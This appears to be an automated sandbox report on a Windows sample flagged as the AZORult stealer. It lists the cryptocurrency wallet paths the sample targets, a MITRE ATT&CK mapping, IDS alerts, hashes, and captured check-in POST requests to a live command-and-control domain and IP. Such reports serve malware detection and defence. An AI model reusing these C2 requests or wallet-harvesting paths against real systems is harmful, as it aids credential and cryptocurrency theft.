Source: Yara match	File source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UoktqWamLR.exe PID: 4952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UoktqWamLR.exe PID: 6164, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: electrum.dat
Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: Coins\Exodus
Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: Coins\Ethereum
Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	22 Virtualization/Sandbox Evasion	OS Credential Dumping	331 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	111 Process Injection	LSASS Memory	22 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
UoktqWamLR.exe	63%	ReversingLabs	Win32.Trojan.AZORult
UoktqWamLR.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://ehzwq.shop/erd/mac/index.phpa	100%	Avira URL Cloud	malware
http://ip-api.com/j	0%	Avira URL Cloud	safe
https://dotbit.me/a/	0%	Avira URL Cloud	safe
https://ehzwq.shop/	100%	Avira URL Cloud	malware
https://ehzwq.shop/erd/mac/index.php	100%	Avira URL Cloud	malware
http://ip-api.com/json	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ehzwq.shop	45.77.249.79	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ehzwq.shop/erd/mac/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ip-api.com/j	UoktqWamLR.exe, 00000000.00000003.2146906626.0000000000752000.00000004.00000020.00020000.00000000.sdmp, UoktqWamLR.exe, 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ehzwq.shop/erd/mac/index.phpa	UoktqWamLR.exe, 00000002.00000002.2192999900.0000000000658000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ehzwq.shop/	UoktqWamLR.exe, 00000002.00000002.2192999900.0000000000698000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ip-api.com/json	UoktqWamLR.exe, UoktqWamLR.exe, 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dotbit.me/a/	UoktqWamLR.exe, UoktqWamLR.exe, 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.77.249.79	ehzwq.shop	United States		20473	AS-CHOOPAUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1504708
Start date and time:	2024-09-05 10:21:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	UoktqWamLR.exe renamed because original name is a hash value
Original Sample Name:	97CC0E7D7CAA3483E4C5E5CFF9FBE67E.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 42 Number of non-executed functions: 98
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: UoktqWamLR.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.77.249.79	RgZaLjgCto.exe	Get hash	malicious	Tinba	Browse	uyhgqunqkxnx.pw/EiDQjNbWEQ/
45.77.249.79	java.exe	Get hash	malicious	Tinba	Browse	uyhgqunqkxnx.pw/EiDQjNbWEQ/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ehzwq.shop	Modifications_List.one	Get hash	malicious	AZORult	Browse	172.67.162.36
	kahyts.exe	Get hash	malicious	GuLoader	Browse	172.67.162.36
	HSBC_PAYMENT.exe	Get hash	malicious	Azorult, GuLoader	Browse	172.67.162.36
	Apixaban _August 2024.exe	Get hash	malicious	Azorult, GuLoader	Browse	104.21.10.25
	IMG79600253.exe	Get hash	malicious	Azorult, PureLog Stealer	Browse	111.90.143.196
	Synarmogoidea.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.67.162.36

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	client.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	95.179.246.167
	AUG 2024 SOA.exe	Get hash	malicious	FormBook	Browse	104.207.148.137
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	95.179.250.45
	DN.exe	Get hash	malicious	FormBook	Browse	104.207.148.137
	154.213.187.80-arm-2024-08-30T23_29_44.elf	Get hash	malicious	Mirai	Browse	204.80.154.118
	SecuriteInfo.com.Win32.TrojanX-gen.12944.32631.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	95.179.250.45
	mirai.arm.elf	Get hash	malicious	Mirai	Browse	207.148.95.53
	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	95.179.250.45
	wfJfUGeGT3.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	95.179.163.21
	Iv7oa1Q1P1.exe	Get hash	malicious	XenoRAT	Browse	155.138.205.64

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	bcBUSLgrmY.exe	Get hash	malicious	Unknown	Browse	45.77.249.79
	bcBUSLgrmY.exe	Get hash	malicious	Unknown	Browse	45.77.249.79
	1.ps1	Get hash	malicious	Unknown	Browse	45.77.249.79
	FileApp.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRAT	Browse	45.77.249.79
	9iv4fU9AVx.exe	Get hash	malicious	GuLoader	Browse	45.77.249.79
	51T93e7bGc.exe	Get hash	malicious	GuLoader	Browse	45.77.249.79
	Camperede.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.77.249.79
	SecuriteInfo.com.Win64.MalwareX-gen.12960.26657.exe	Get hash	malicious	Unknown	Browse	45.77.249.79
	PO-5109542537.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	45.77.249.79
	VDF645425140#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	45.77.249.79

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.831376323923726
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	UoktqWamLR.exe
File size:	1'069'056 bytes
MD5:	97cc0e7d7caa3483e4c5e5cff9fbe67e
SHA1:	e74e03ad3d8f52ce5858a5e8208343fa04a2b367
SHA256:	65e1b5713b271302e96bab80440f744c13c953749562603ea3ee03eda880f9ea
SHA512:	320b84be5ade8681a0be7bd862dfa1b65f75189cc95967ed586d9efdb3c68a8f243861c399339b42f9688561c2f217a6e9d8e4b2e586a4d4f2f583eca711c357
SSDEEP:	24576:OLPskXqS0jFC6LkpzqPskXqS0jFC6LkpzWoKywypSpbYmb93PK/:QJXUJC6LkpzqJXUJC6LkpzEMSNYmpy/
TLSH:	B63502A1A9F9A630C1951038F964FF6C8A192CE5CE48DE057F3C1F079B61BD2B7A7085
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y.b.....................p......u>....... ....@.................................\|......................................

File Icon


Icon Hash:	00869eb0b230201f

Static PE Info

General

Entrypoint:	0x4f3e75
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x62EB79BF [Thu Aug 4 07:48:15 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	67d5cc60f9a80cf612cceb6c4d2f15fe

Entrypoint Preview

Instruction
jmp 00007F2C407CB94Bh
add byte ptr [esi+12FB4C95h], al
div bh
adc eax, 7372553Fh
jnle 00007F2C408BE549h
jnl 00007F2C408BE56Fh
insb
jns 00007F2C408BE4CDh
pop dword ptr [ebx]
retf BA51h
jecxz 00007F2C408BE4DFh
imul eax, dword ptr [ebp+68355991h], B5h
fld st(0), st(3)
rcr byte ptr [edx+4Fh], cl
sub eax, C82B3261h
sub eax, FF7674D1h
out dx, eax
pop es
ficom dword ptr [ecx+ebp*4-4323672Ch]
sbb eax, B9D13E9Ah
push ecx
shr dword ptr [ebx+edx*2-53845915h], 1
movsb
cli
adc esi, edx
int1
test byte ptr [7AB0D376h], bl
or al, 0Bh
xlatb
and al, 60h
mov word ptr [esi+49D4DBA2h], seg?
dec byte ptr [eax+ebp*2]
in eax, dx
add dword ptr [esi+esi*8-0Ah], 565FDB8Eh
aad 6Ah
cli
loope 00007F2C408BE4D1h
bswap ebp
pop dword ptr [38BDD5ABh]
daa
inc edi
push FFFFFFBCh
lodsb

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1024c0	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x108000	0x8b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x102000	0x1bc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x100fc4	0x101000	c4566aa655f60351d3dbac95d79761db	False	0.8666118221060312	data	7.8724464732051125	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x102000	0xc74	0x1000	7ad9d40f7ccfbd00e1362c73d0bffe1a	False	0.306640625	data	4.19207049615358	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x103000	0x4448	0x1000	620f0b67a91f7f74151bc5be745b7110	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x108000	0x8b4	0x1000	a91760e51b488969668964180d93d0b7	False	0.1640625	data	1.889714708388577	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x108784	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 256			0.3223684210526316
RT_ICON	0x10849c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640			0.19623655913978494
RT_ICON	0x108374	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192			0.4155405405405405
RT_GROUP_ICON	0x108344	0x30	data			1.0
RT_VERSION	0x108150	0x1f4	data	German	Germany	0.5

Imports

DLL

Import

KERNEL32.DLL

GetProcAddress, VirtualAlloc, GetModuleHandleW

MSVBVM60.DLL

__vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaAryMove, __vbaLineInputStr, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaRefVarAry, __vbaBoolVarNull, _CIsin, __vbaVargVarMove, __vbaVarZero, __vbaVarCmpGt, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, DllFunctionCall, __vbaVarOr, __vbaRedimPreserve, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaNew, _CIsqrt, EVENT_SINK_QueryInterface, __vbaStr2Vec, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaVarCopy, __vbaVarLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, __vbaStrVarCopy, __vbaForEachVar, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeStr, __vbaFreeObj

Possible Origin

Language of compilation system	Country where language is spoken	Map
German	Germany

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-05T10:21:53.608256+0200	2016858	ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)	1	192.168.2.5	49707	45.77.249.79	443	TCP
2024-09-05T10:22:12.936290+0200	2822521	ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)	1	45.77.249.79	443	192.168.2.5	49704	TCP
2024-09-05T10:22:13.752816+0200	2029465	ET MALWARE Win32/AZORult V3.2 Client Checkin M15	1	192.168.2.5	49704	45.77.249.79	443	TCP
2024-09-05T10:22:13.752816+0200	2810276	ETPRO MALWARE AZORult CnC Beacon M1	1	192.168.2.5	49704	45.77.249.79	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2024 10:22:11.326294899 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:11.326359987 CEST	443	49704	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:11.326598883 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:11.339844942 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:11.339904070 CEST	443	49704	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:12.800450087 CEST	443	49704	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:12.800571918 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:12.936258078 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:12.936290026 CEST	443	49704	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:12.936640024 CEST	443	49704	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:12.936697960 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:12.939150095 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:12.980509996 CEST	443	49704	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:13.752841949 CEST	443	49704	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:13.752918005 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:13.752923965 CEST	443	49704	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:13.752978086 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:13.753051043 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:13.753072023 CEST	443	49704	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:13.753088951 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:13.753118038 CEST	49704	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:14.432338953 CEST	49707	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:14.432388067 CEST	443	49707	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:14.432488918 CEST	49707	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:14.432540894 CEST	49707	443	192.168.2.5	45.77.249.79
Sep 5, 2024 10:22:14.432549000 CEST	443	49707	45.77.249.79	192.168.2.5
Sep 5, 2024 10:22:14.432657003 CEST	443	49707	45.77.249.79	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2024 10:22:10.652878046 CEST	57528	53	192.168.2.5	1.1.1.1
Sep 5, 2024 10:22:11.316706896 CEST	53	57528	1.1.1.1	192.168.2.5
Sep 5, 2024 10:22:13.768757105 CEST	49487	53	192.168.2.5	1.1.1.1
Sep 5, 2024 10:22:14.431514025 CEST	53	49487	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 5, 2024 10:22:10.652878046 CEST	192.168.2.5	1.1.1.1	0xb558	Standard query (0)	ehzwq.shop	A (IP address)	IN (0x0001)	false
Sep 5, 2024 10:22:13.768757105 CEST	192.168.2.5	1.1.1.1	0xcb9b	Standard query (0)	ehzwq.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 5, 2024 10:22:11.316706896 CEST	1.1.1.1	192.168.2.5	0xb558	No error (0)	ehzwq.shop	45.77.249.79	A (IP address)	IN (0x0001)	false
Sep 5, 2024 10:22:11.316706896 CEST	1.1.1.1	192.168.2.5	0xb558	No error (0)	ehzwq.shop	178.62.201.34	A (IP address)	IN (0x0001)	false
Sep 5, 2024 10:22:14.431514025 CEST	1.1.1.1	192.168.2.5	0xcb9b	No error (0)	ehzwq.shop	45.77.249.79	A (IP address)	IN (0x0001)	false
Sep 5, 2024 10:22:14.431514025 CEST	1.1.1.1	192.168.2.5	0xcb9b	No error (0)	ehzwq.shop	178.62.201.34	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ehzwq.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	45.77.249.79	443	6164	C:\Users\user\Desktop\UoktqWamLR.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 10:22:14.432540894 CEST	326	OUT	POST /erd/mac/index.php HTTP/1.0 Host: ehzwq.shop Connection: close User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Content-Length: 101 Data Raw: 4a 4c ef bf bd 28 39 ef bf bd 4c 2f ef bf bd 39 2f ef bf bd 39 4f ef bf bd 3f 4e ef bf bd 3e 3c ef bf bd 3e 33 ef bf bd 3e 3e ef bf bd 3e 3b ef bf bd 3e 3e ef bf bd 3e 33 ef bf bd 3e 3a ef bf bd 3e 3d ef bf bd 3f 4e ef bf bd 28 39 ef bf bd 28 39 ef bf bd 28 39 ef bf bd 28 39 ef bf bd 4b 2f ef bf bd 3d 4c ef bf bd 3f 4e ef bf bd 4b 4b ef bf bd 28 39 ef bf bd 28 39 ef bf bd 4c 2f ef bf bd 3a 2f ef bf bd 49 2f ef bf bd 3f 4f ef bf bd 3e 33 ef bf bd 3e 38 ef bf bd 28 39 ef bf bd 49 2f ef bf bd 39 4b Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9(9(9(9K/=L?NKK(9(9L/:/I/?O>3>8(9I/9K

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	45.77.249.79	443	6164	C:\Users\user\Desktop\UoktqWamLR.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-05 08:22:12 UTC	165	OUT	POST /erd/mac/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: ehzwq.shop Content-Length: 101 Cache-Control: no-cache
2024-09-05 08:22:12 UTC	101	OUT	Data Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 28 39 fd 28 39 fe 28 39 fe 4b 2f fb 3d 4c ed 3f 4e 8a 4b 4b 8d 28 39 fe 28 39 fe 4c 2f fb 3a 2f fa 49 2f fb 3f 4f ed 3e 33 ed 3e 38 8e 28 39 fe 49 2f fb 39 4b Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9(9(9(9K/=L?NKK(9(9L/:/I/?O>3>8(9I/9K
2024-09-05 08:22:13 UTC	94	IN	HTTP/1.1 200 OK Date: Thu, 05 Sep 2024 08:22:13 GMT Content-Length: 0 Connection: close

Target ID:	0
Start time:	04:21:57
Start date:	05/09/2024
Path:	C:\Users\user\Desktop\UoktqWamLR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UoktqWamLR.exe"
Imagebase:	0x400000
File size:	1'069'056 bytes
MD5 hash:	97CC0E7D7CAA3483E4C5E5CFF9FBE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
